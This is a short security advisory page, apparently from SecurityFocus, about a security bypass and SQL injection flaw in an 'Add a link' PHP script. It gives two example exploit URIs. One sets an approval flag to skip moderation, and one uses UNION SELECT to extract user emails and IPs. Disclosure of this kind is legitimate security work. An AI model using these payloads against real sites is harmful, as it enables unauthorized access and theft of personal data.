Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Add a link Security Bypass and SQL Injection Vulnerabilities

Attackers can exploit the issues via a browser.

The following exploit and example URIs are available:

http://www.example.com/add_link.php?url=http://www.example2.com&linkname=name_of_the_link &approved=1&email=my@email.com&description=blablablablablablabla&category_id=1

http://www.example.com/[addalink-path]/user_read_links.php?category_id=' UNION SELECT 1,1,1,1,1,1,concat(email,0x3a,ip),1,1,1,1 FROM Linklisttable/*







 

Privacy Statement
Copyright 2009, SecurityFocus